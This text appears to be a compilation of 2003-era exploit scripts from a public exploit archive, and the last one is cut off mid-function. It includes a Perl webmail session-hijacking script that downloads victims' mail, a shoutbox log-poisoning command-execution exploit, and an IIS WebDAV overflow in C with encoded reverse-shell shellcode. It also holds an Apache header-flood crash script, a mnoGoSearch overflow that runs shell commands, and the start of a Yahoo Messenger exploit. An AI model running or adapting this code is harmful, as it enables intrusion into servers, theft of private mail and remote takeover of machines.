# send victim HTML message with img src to your
# AnyImage.gif. When victim will read message, script
# will download messages 1..10 from his mailbox (if
# sucessfull).
# Script will work even if "require fixed address" option
# enabled (set $abuseproxy=1), but it needs access to
# users proxy (IP will be detected automatically). So, if
# your victim uses same corporate proxy as you, then
# you're lucky, you can own his mailbox! :)
# If victim uses HTTPS to access CGP webmail, use
# https:// link to image. some browsers will still send
# HTTP_REFERER if _both_ sites are https.
#
# session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
#
# Yaroslav Polyakov. [email protected] www.sysAttack.com
#
use LWP::UserAgent;
# configuration vars
$logfile="/tmp/log";
$url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
$SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
$msglonum=1;
$msghinum=10;
$msgprefix="/tmp/hijacked-";
$abuseproxy=1;
$proxyport=3128;
sub printgif
{
$gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x 00\xc0\xc0\xc0
\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x 00\x00\x00\x00
\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
print "Content-Type: image/gif\n";
print "\n";
print "$gif1x1";
}
open LOG, "> $logfile" || die("cant write to my log");
printgif;
$remote=$ENV{'REMOTE_ADDR'};
$referer=$ENV{'HTTP_REFERER'};
print LOG "remote: $remote\nreferer: $referer\n";
# if($referer=~/SID=([0-9a-zA-Z\-]+)/){
if($referer=~/$SIDREGEXP/){
$SID=$1;
print LOG "SID: $SID\n";
}else{
print LOG "sorry, cant
find out SID\n";
exit;
}
# create request
my $ua = new LWP::UserAgent;
$ua->agent("shj - sysAttack CGP session HiJack/1.0");
if($abuseproxy){
print LOG "set proxy
http://$remote:$proxyport/\n";
$ua->proxy('http',
"http://$remote:$proxyport/");
}
for($index=$msglonum;$index<=$msghinum;$index++){
$eurl=$url;
$eurl =~ s/%N%/$index/;
$eurl =~ s/%SID%/$SID/;
print LOG "fetching $eurl\n";
$request = new HTTP::Request("GET", $eurl);
$response = $ua->request($request);
if($response){
print LOG
$response->code." ".$response->message
."\n";
open MSG, ">
$msgprefix$index" or die('cant crea
te $msgprefix$index');
print MSG
$response->content;
close MSG;
}else{
print LOG "undefined
response\n";
}
}
close LOG;
# [2003-05-05]
80 Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
#!/usr/bin/perl
#
# Webfroot Shoutbox < 2.32 on apache exploit
#
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/httpd/access_log",
"/var/log/httpd/access.log",
#"D:/apps/Apache Group/Apache2/logs/access.log"
);
my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?>
</pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
my $conn;
if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
$type = $ARGV[0];
}
else {
print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\n";
print "Usage: \n Webfroot.pl (x|r) host [command] [path] [port]\n";
print "\ttype\tx = exploit | r = run command (after run with x option)\n";
print "\thost\thostname\n";
print "\tcommand\tcommand to execute on remote server\n";
print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
print "\tport\tport number\n";
exit;
}
if ($ARGV[1]){
$host = $ARGV[1];
}
if ($ARGV[2]){
$cmd = $ARGV[2];
}
if ($ARGV[3]){
$shoutboxpath = $ARGV[3];
}
if ($ARGV[4]){
$port = int($ARGV[4]);
}
$cmd =~ s/ /+/g;
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die " Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub connect_end {
#print "[x] Close connection\n";
close($conn);
}
sub exploit {
my $access_log = $_[0];
my $result = "";
$access_log =~ s/ /+/g;
my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\
nHost: $host\nConnection: Close\n\n";
print "$query";
print "[x] Access log : ", $access_log ,"\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result = $line;
#print $result;
};
&connect_end;
}
sub run_cmd {
my $conf="/tmp/.ex";
#my $conf="d:/tmp/.ex";
my $result = "";
my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\
nHost: $host\nConnection: Close\n\n";
print "[x] Run command ...\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
if ($result =~ /Result:/){
print $result;
} else {
print $result;
print " Failed ...";
}
}
sub insert_code {
my $result = "";
print "[x] Access log : ", $access_log ,"\n";
print "[x] Insert php code into apache access log ...\n";
&connect_to;
print $conn "$qinit";
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
print $result;
}
if ($type eq "x"){
&insert_code;
print "[x] Trying to exploit ...\n";
for ($i = 0;$i <= $#logs; $i++){
&exploit($logs[$i]);
}
&run_cmd;
} else {
&run_cmd;
}
# [2003-05-29]
80 MS Windows WebDav II (New) Remote Root Exploit
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* 29/05/2003 - by Alumni - */
/* Microsoft IIS WebDAV New Exploit */
/* spawns shell on port 32768 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#define SHELLCODELEN 753
#define NOP 0x90
#define BUFFERLEN 1024
#define RET 0x41424344
#define GMHOFF 30
#define GPAOFF 38
#define IPOFF 161
#define DEFPORT 32768
//#define DEBUGGEE_FLOW // for debug only
#ifdef DEBUGGEE_FLOW
#define GMH (long)GetModuleHandle
#define GPA (long)GetProcAddress
#else
#define GMH 0x0100107C // GetModuleHandle@
#define GPA 0x01001034 // GetProcAddress@
#endif
#define XOROFF 11
#define SOFF 16
char prologue[] =
"\xEB\x03" // jmp $+3
"\x58" // pop eax
"\x50" // push eax
"\xC3" // retn
"\xE8\xF8\xFF\xFF\xFF" // call $-3
"\xB2" // mov dl, %key
"\x90" // %key
"\x33\xC9" // xor ecx, ecx
"\x66\xB9" // mov cx, shellcodesize
"\x04\x03" // shellcodesize = hex(SHELLCODELEN)
"\x04\x14" // add al, 0x14
"\x30\x10" // xor byte ptr[eax], dl
"\x40" // inc eax
"\x66\x49" // dec cx
"\x67\xE3\x02" // jcxz $+5
"\xEB\xF6" // jmp $-8
;
char shellcode[SHELLCODELEN+1] =
"\xe8\x5f\x02\x00\x00\x8b\xe8\x33\xf6\x66\xbe\x80"
"\x00\x03\xf4\xc7\x46\xf0\x00\x00\x00\x00\xc7\x46"
"\xf4\x00\x00\x00\x00\xb8\xf2\x12\x40\x00\x89\x46"
"\xf8\xb8\xf8\x12\x40\x00\x89\x46\xfc\x8b\xd5\x81"
"\xc2\x9e\x02\x00\x00\x52\xff\x56\xf8\x89\x46\xf4"
"\x8b\xd5\x81\xc2\xab\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x68\x00\x10\x00\x00\x6a\x40\xff\xd0"
"\x8b\xf8\x8b\xc7\x8b\xfe\x8b\xf0\x83\xc6\x20\x8b"
"\x47\xf8\x89\x46\xf8\x8b\x47\xf4\x89\x46\xf4\x8b"
"\x47\xfc\x89\x46\xfc\x8b\xd5\x81\xc2\x6e\x02\x00"
"\x00\x52\xff\x56\xf8\x89\x46\xf0\x8b\xd5\x81\xc2"
"\x7e\x02\x00\x00\x52\xff\x76\xf0\xff\x56\xfc\x8b"
"\xd8\x6a\x06\x6a\x01\x6a\x02\xff\xd3\x89\x06\x8b"
"\xd6\x83\xc2\x14\xb8"
"\x7f\x00\x00\x01" // put your ip here (run netcat before,
e.g. 127.0.0.1)
"\x89\x42\x04\x66\xc7\x02\x02\x00\x66\xb8"
"\x80\x00" // specify connectious port here (e.g.
32768)
"\x66\x89\x42"
"\x02\x8b\xd5\x81\xc2\x8a\x02\x00\x00\x52\xff\x76"
"\xf0\xff\x56\xfc\x8b\xd8\x6a\x10\x8b\xd6\x83\xc2"
"\x14\x52\xff\x36\xff\xd3\x83\xf8\xff\x0f\x84\x84"
"\x01\x00\x00\x8b\xd5\x81\xc2\x79\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\x8b\xd6\x6a\x00"
"\x68\x64\x0f\x00\x00\x81\xc2\x9c\x00\x00\x00\x52"
"\xff\x36\xff\xd3\xc6\x84\x30\x9c\x00\x00\x00\x00"
"\xbb\x00\x00\x00\x00\x66\xb9\x0c\x00\x8a\x84\x2b"
"\x62\x02\x00\x00\x88\x84\x33\x90\x00\x00\x00\x43"
"\x66\x49\x66\x83\xf9\x00\x75\xe9\x8b\xfe\x81\xc7"
"\x84\x00\x00\x00\xc7\x07\x0c\x00\x00\x00\xc7\x47"
"\x04\x00\x00\x00\x00\xc7\x47\x08\x01\x00\x00\x00"
"\x8b\xfe\x8b\xd6\x8b\xce\x81\xc7\x84\x00\x00\x00"
"\x83\xc2\x0c\x83\xc1\x10\x6a\x00\x57\x51\x52\x8b"
"\xd5\x81\xc2\xc9\x02\x00\x00\x52\xff\x76\xf4\xff"
"\x56\xfc\x8b\xd8\xff\xd3\x8b\xfe\x83\xc7\x34\xc7"
"\x07\x44\x00\x00\x00\x66\xc7\x47\x30\x00\x00\xc7"
"\x47\x2c\x01\x01\x00\x00\x8b\x46\x10\x89\x47\x3c"
"\x89\x47\x40\x8b\xd6\x8b\xde\x8b\xce\x81\xc2\x90"
"\x00\x00\x00\x83\xc3\x34\x83\xc1\x78\x51\x53\x6a"
"\x00\x6a\x00\x6a\x00\x6a\x01\x6a\x00\x6a\x00\x52"
"\x6a\x00\x8b\xd5\x81\xc2\xd4\x02\x00\x00\x52\xff"
"\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5\x81"
"\xc2\xbd\x02\x00\x00\x52\xff\x76\xf4\xff\x56\xfc"
"\x8b\xd8\xff\x76\x10\xff\xd3\x8b\xd6\x83\xc2\x08"
"\x8b\xd5\x81\xc2\xb7\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x8b\xd8\x68\x88\x13\x00\x00\xff\xd3"
"\x8b\xd6\x8b\xce\x81\xc2\x90\x00\x00\x00\x83\xc1"
"\x08\x8b\x5e\x08\x6a\x00\x51\x68\x70\x0f\x00\x00"
"\x52\xff\x76\x0c\x8b\xd5\x81\xc2\xe3\x02\x00\x00"
"\x52\xff\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b"
"\xd6\x81\xc2\x90\x00\x00\x00\x6a\x00\xff\x76\x08"
"\x52\xff\x36\x8b\xd5\x81\xc2\x85\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5"
"\x81\xc2\x92\x02\x00\x00\x52\xff\x76\xf0\xff\x56"
"\xfc\x8b\xd8\xff\x36\xff\xd3\xe9\x1c\xfe\xff\xff"
"\x58\x50\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x20\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c"
"\x4c\x00\x72\x65\x63\x76\x00\x73\x6f\x63\x6b\x65"
"\x74\x00\x73\x65\x6e\x64\x00\x63\x6f\x6e\x6e\x65"
"\x63\x74\x00\x63\x6c\x6f\x73\x65\x73\x6f\x63\x6b"
"\x65\x74\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e"
"\x44\x4c\x4c\x00\x47\x6c\x6f\x62\x61\x6c\x41\x6c"
"\x6c\x6f\x63\x00\x53\x6c\x65\x65\x70\x00\x43\x6c"
"\x6f\x73\x65\x48\x61\x6e\x64\x6c\x65\x00\x43\x72"
"\x65\x61\x74\x65\x50\x69\x70\x65\x00\x43\x72\x65"
"\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x41\x00"
"\x52\x65\x61\x64\x46\x69\x6c\x65\x00";
char xmlbody[] ="<?xml version=\"1.0\"?>\r\n<g:searchrequest
xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\"
from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
long retaddr, buffsize;
char* buffer;
unsigned long getlocalhostip()
{
char buff[128];
in_addr inaddr;
if(!gethostname(buff,128))
{
memcpy(&inaddr,gethostbyname(buff)->h_addr,4);
return(inet_addr(inet_ntoa(inaddr)));
}
return (-1);
}
ULONG WINAPI AcceptThread(LPVOID lpParam)
{
int ln1;
unsigned long slisten, sacc;
sockaddr_in saddrin;
slisten = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (slisten!=INVALID_SOCKET)
{
saddrin.sin_addr.s_addr = INADDR_ANY;
saddrin.sin_family = AF_INET;
saddrin.sin_port = htons(DEFPORT);
bind(slisten,(struct sockaddr*)&saddrin,sizeof(saddrin));
listen(slisten,5);
while (1)
{
ln1 = sizeof(saddrin);
sacc = accept(slisten,(struct sockaddr*)
&saddrin,&ln1);
if (sacc!=INVALID_SOCKET)
{
printf("\n\nShell succesfully spawned on
remote host\nNetcat to %d",DEFPORT);
ExitProcess(0);
}
}
}
return (1);
}
ULONG SendRequest (char* sHost, int iPort)
{
char* buffsend;
struct sockaddr_in saddr_in;
int timeout;
unsigned long sock;
buffsend = (char*)malloc(buffsize+256);
memset(buffsend,0,buffsize+256);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr_in.sin_addr.s_addr = inet_addr(sHost);
saddr_in.sin_family = AF_INET;
saddr_in.sin_port = htons(iPort);
if (!connect(sock,(struct sockaddr*)&saddr_in,sizeof(saddr_in)))
{
timeout = 5000;
setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)
&timeout,sizeof(timeout));
setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)
&timeout,sizeof(timeout));
sprintf(buffsend,"SEARCH / HTTP/1.1\r\nHost:%s\r\nContent-
Type: text/xml\r\nContent-Length: %d\r\n\r\n%s%s",strlen(xmlbody)+strlen
(buffer),xmlbody,buffer);
send (sock,buffsend,strlen(buffsend),0);
closesocket(sock);
}
else return(1);
return (0);
}
void dispUsage(char* str1)
{
printf ("IIS WebDAV exploit by Alumni - The Matrix Reloaded -\n");
printf ("Usage: %s <ipv4dot> <port> [<buffsize>] [<retaddr>]
\n\n",str1);
return;
}
int main(int argc, char** argv)
{
unsigned long uThread;
int prologuelen = 0, i;
char xorkey = 0;
long *ptr1;
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0),&wsadata);
buffsize = BUFFERLEN;
retaddr = RET;
#ifndef DEBUGGEE_FLOW
if (argc<3)
{
dispUsage(argv[0]);
return (1);
}
if (argc>=4) buffsize = atoi(argv[3]);
if (argc>=5) retaddr = atol(argv[4]);
#endif
buffer = (char*) malloc(buffsize+1);
ptr1 = (long*)buffer;
memset(buffer,0,buffsize);
CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
AcceptThread,NULL,NULL,&uThread);
*(long*)(shellcode+GMHOFF) = GMH;
*(long*)(shellcode+GPAOFF) = GPA;
*(long*)(shellcode+IPOFF) = getlocalhostip();
for (i=0;i<256;i++)
{
int iBool = 1, j;
for (j=0;j<SHELLCODELEN;j++)
if ((shellcode[j]^i)==0 || (shellcode[j]^i)==0x0d
|| (shellcode[j]^i)==0x0a) iBool = 0;
if (iBool)
{
xorkey = i;
break;
}
}
for (i=0;i<SHELLCODELEN;i++) shellcode[i] ^= xorkey;
for (i=0;i<(buffsize-SHELLCODELEN)/2;i++) buffer[i] = NOP;
prologue[XOROFF] = xorkey;
*(short int*)(prologue+SOFF) = SHELLCODELEN;
strncat(buffer,prologue,buffsize);
prologuelen = strlen(buffer);
for (i=prologuelen;i<SHELLCODELEN+prologuelen;i++) buffer[i] =
shellcode[i-prologuelen];
prologuelen = strlen(buffer);
buffer[prologuelen] = NOP;
buffer[prologuelen+1] = NOP;
buffer[prologuelen+2] = NOP;
buffer[prologuelen+3] = NOP;
for (i=(prologuelen+3) & (~3);i<buffsize;i+=sizeof(retaddr)) *
(long*)(buffer+i) = retaddr;
buffer[buffsize] = 0;
printf ("%s",buffer);
#ifdef DEBUGGEE_FLOW
__asm {
mov eax, ptr1
call eax
}
#else
SendRequest(argv[1],atoi(argv[2]));
#endif
WSACleanup();
return (0);
}
// [2003-06-01]
80 Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
#!/usr/bin/perl
#
# Apache 2.0.37 - 2.0.45 APR Exploit
# Written By Matthew Murphy
#
# This Perl script will successfully exploit any un-patched Apache 2.x
# servers.
#
# Base64 Encoder
#
# If you want authentication with the server via HTTP's lame Basic
# auth, put the proper string to encode BASE64 content, and use
# '%s' to represent the credentials being encoded. For instance:
#
# base64 %s
#
# would result in:
#
# base64 userid:password
#
# If your decoder requires you to use STDIN to pass the password
# (no pun intended), set $BASE64_USE_STDIN to nonzero and do not
# use '%s' on the command-line.
$BASE64_CMD_STRING = "use_base64_encoder_here %s";
# Base64 encoder piping
#
# If your encoder requires the password to be written to STDIN,
# set this to a nonzero value. NOTE: This requires support for
# bi-directional pipes on your OS version.
$BASE64_USE_STDIN = 0;
# Base64 encoder input handling
#
# If your encoder requires a newline after your credentials,
# set this to your newline character.
$BASE64_WRITE_NL = "";
use IO::Socket;
print STDOUT "Apache 2.0 APR Exploit\r\n";
print STDOUT "By Matthew Murphy\r\n\r\n";
print STDOUT "Enter the hostname/IP address of the server: ";
$line = <STDIN>;
$host = mychomp($line);
print STDOUT "Enter the port of the server \[80\]: ";
$line = <STDIN>;
$port = mychomp($line);
print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
print STDOUT "What username shall we use: ";
$line = <STDIN>;
$user = mychomp($line);
print STDOUT "What password shall we use: ";
$line = <STDIN>;
$pass = mychomp($line);
$auth = "$user:$pass";
if ($BASE64_USE_STDIN) {
# l33t Perl piping trix; NOTE: This is definitely
# Alpha code! :-)
pipe(STDOUTREAD, STDOUTWRITE);
pipe(STDINREAD, STDINWRITE);
open(OLDSTDIN, "&STDIN");
open(OLDSTDOUT, ">&STDOUT");
open(STDIN, "&STDINREAD");
open(STDOUT, ">&STDOUTWRITE");
close(STDINREAD);
close(STDOUTWRITE);
system($BASE64_CMD_STRING);
open(STDIN, "&OLDSTDIN");
open(STDOUT, "&>OLDSTDOUT");
close(OLDSTDIN);
close(OLDSTDOUT);
print STDINWRITE $auth;
close(STDINWRITE);
read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
close(STDOUTREAD);
} else {
open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
read(READOUTPUT, $base64, 4096); # See above
close(READOUTPUT);
}
# Another hack for dealing with base64 encoders that output
# multi-lined encoded text. HTTP specifically calls for a
# single line. Note that this pattern also messes with spaces,
# tabs, etc., but base64 doesn't use those either, so this
# shouldn't matter.
$base64 = join("", split(/ /, $base64));
} else {
$base64 = undef;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
print STDOUT "Exploiting a proxy server \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
print $f "GET / HTTP/1.1\x0d\x0a";
# Apache 2.0 tries to limit header inputs, but uses a hash table
# that ultimately concatenates multiple headers of the same name
# together with ", " between them, so:
#
# Host: a
# Host: b
#
# Bypasses Apache's buffer size checks, but ends up as:
#
# Host: a,b
#
# When processed. Confirm this with a TRACE against your server:
#
# TRACE / HTTP/1.1
# Host: a
# Host: b
#
# The "message/http" body you receive will contain:
#
# TRACE / HTTP/1.1
# Host: a,b
#
# So, for those of you who are confused by this code fragment,
# this is what it ultimately achieves!
for ($i = 0; $i < 10; $i++) {
print $f "Host: ".("A"x2000)."\r\n";
}
if (defined($base64)) {
print $f "Proxy-Authorization: Basic ".$base64."\r\n";
}
print $f "\r\n";
} else {
print STDOUT "What resource should be probed: ";
$line = <STDIN>;
$res = mychomp($line);
print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
# WARNING:
# Another section of alpha code here; mod_dav tends to barf
# if given the smallest inconsistency, and this is not
# exactly well-researched. If this doesn't work for you,
# target your DAV repository as a typical resource: if
# UseCanonicalName On hasn't been set explicitly, mod_dav
# will choke on that as well.
#
# STunnel should not have issues with this, as you can't
# use a "Host" header in an SSL connection anyway, so
# that is no problem.
#
# Note that if the body is too long, IIS servers will also
# die (assuming of course, that the latest IIS cumulative
# patch has not been applied), as they have had problems
# dealing with WebDAV in the very recent past.
# XML Body of Request
#
# If everything works, mod_dav will attempt to format a
# message with apr_psprintf() to indicate that our
# namespace is invalid, leading to a crash.
$xmlbody = "<?xml version=\"1.0\"?>\r\n";
$xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
$xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
$xmlbody.= "</D:propfind>";
# HTTP headers
print $f "PROPFIND $res HTTP/1.1\r\n";
print $f "Host: $host:$port\r\n";
print $f "Depth: 1\r\n";
print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
print $f "Content-Length: ".length($body)."\r\n\r\n";
if (defined($base64)) {
print $f "Authorization: Basic ".$base64."\r\n";
}
print $f "$xmlbody\r\n\r\n";
} else {
# This does *almost* the exact same thing as the mod_proxy
# code, and could be considered wasteful, but a few extra
# CPU cycles never killed anybody. :-(
print $f "GET $res HTTP/1.1\r\n";
for ($i = 0; $i < 10; $i++) {
print $f "Host: ".("A"x2000)."\r\n";
}
if (defined($base64)) {
print $f "Authorization: Basic ".$base64."\r\n";
}
print $f "\r\n";
}
}
while (defined($ln = <$f>)) {
print STDOUT $ln;
}
undef $f;
exit;
# FIXED: The perl chomp() function is broken on my distro,
# so I hacked a fix to work around it. This note applies
# to ActivePerl 5.8.x -- I haven't tried others. This is
# another hackish fix, which seems to be the entire style
# of this code. I'll write better toys when I have time to
# write better toys.
sub mychomp {
my $data;
my $arg = shift;
my $CRLF;
if ($^O == "MSWin32") {
$CRLF = 1;
} else {
$CRLF = 0;
}
$data = substr($arg, 0, length($arg) - $CRLF);
return $data;
}
# [2003-06-08]
80 mnoGoSearch 3.1.20 Remote Command Execution Exploit
#!/usr/bin/perl
#
# [ reloaded ]
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#
use IO::Socket;
$host = "127.0.0.1";
$cmd = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;
my $conn;
if ($ARGV[0]){
$host = $ARGV[0];
}
else {
print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
print "\thost\thostname to exploit\n";
print "\tcommand\tcommand to execute on server\n";
print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
print "\tport\tport to connect to\n";
print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
print "\tret\treturn address default bfffd0d0\n";
exit;
}
if ($ARGV[1]){
$cmd = $ARGV[1];
}
if ($ARGV[2]){
$searchpath = $ARGV[2];
}
if ($ARGV[3]){
$port = int($ARGV[3]);
}
if ($ARGV[4]){
$suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
$rawret = hex_to_int($ARGV[5]);
}
#########~~ start function ~~#########
sub hex_to_int {
my $hs = $_[0];
$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
(hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
}
sub int_to_hex {
my $in = $_[0];
$hex = sprintf "%x",$in;
}
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die " incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
$ret .= chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
}
}
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die " Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...\n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /_test_/){
print "[x] Correct version detected .. possibly vulnerable ...\n";
} else {
print $result;
die "[x] New version or wrong url\n";
}
}
sub exploit {
my $rw = $_[0];
$result = "";
# linux ix86 shellcode rip from phx.c by proton
$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x 7e\x04\x8d\x7e\x1b\x89\x7e\x08"
."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x 31\xc0\x88\x07\x89\x46\x0c\x88"
."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\x cd\x80\x31\xdb\x89\xd8\x40\xcd"
."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x 41\x41\x41\x41\x41\x41\x41\x41"
."\x41\x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
$strret = int_to_hex($rw);
$ret = string_to_ret($strret);
$envvar = 'B' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query string
$buffer = "B" x $suffsize;
$buffer .= "B" x 4800;
$buffer .= $ret x 200;
$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
."Accept: $envvar\n"
."Accept-Language: $envvar\n"
."Accept-Encoding: $envvar\n"
."User-Agent: Mozilla/4.0\n"
."Host: $host\n"
."Connection: Close\n\n";
&connect_to;
print "[x] Sending exploit code ..\n";
print "[x] ret: $strret\n";
print "[x] suf: $suffsize\n";
print "[x] length:",length($request),"\n";
print $conn "$request";
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
}
sub check_result {
if ($result =~ /hello/ && !($result =~ /text\/html/)){
print $result;
$success = 1;
} else {
print $result;
print " Failed ...\n";
$success = 0;
}
}
#########~~ end function ~~#########
&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
&exploit($rawret);
&check_result;
if ($success == 1){
exit;
}
sleep 1;
}
# [2003-06-10]
80 Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)
/*
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-<-<-<--|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
* ^__________^
*
*
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h> /* These are the usual header files */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */
static int port =80;
/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";
/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop :) lol ! \
*/
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x 6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()
static int port;
void Usage(char *programName)
{
printf("\n\t\t---------------------------------------------------\n");
printf("\t\t\t\tDtors Security Research (DSR) \n");
printf("\t\t\t\tCode by: Rave\n");
printf("\t\t\t\tMail: [email protected]\n");
printf("\t\t---------------------------------------------------\n\n");
/* Modify here to add your usage message when the program is
* called without arguments */
printf("\t\t---------------------------------------------------\n\n");
fprintf(stdout,"\t\t-P local webserver server portnumber\n");
fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n");
printf("\t\t---------------------------------------------------\n\n");
}
/* returns the index of the first argument that is not an option; i.e.
does not start with a dash or a slash
*/
int HandleOptions(int argc,char *argv[])
{
int i,firstnonoption=0;
for (i=1; i< argc;i++) {
if (argv[i][0] == '/' || argv[i][0] == '-') {
switch (argv[i][1]) {
/* An argument -? means help is requested */
case '?':
Usage(argv[0]);
break;
case 'P':
port=atoi(argv[i+1]);break;
case 'H':
if (!stricmp(argv[i]+1,"help")) {
Usage(argv[0]);
break;
}
/* If the option -h means anything else
* in your application add code here
* Note: this falls through to the default
* to print an "unknow option" message
*/
/* add your option switches here */
default:
fprintf(stderr,"unknown option %s\n",argv[i]);
break;
}
}
else {
firstnonoption = i;
break;
}
}
return firstnonoption;
}
int main(int argc,char *argv[])
{
FILE *fptr;
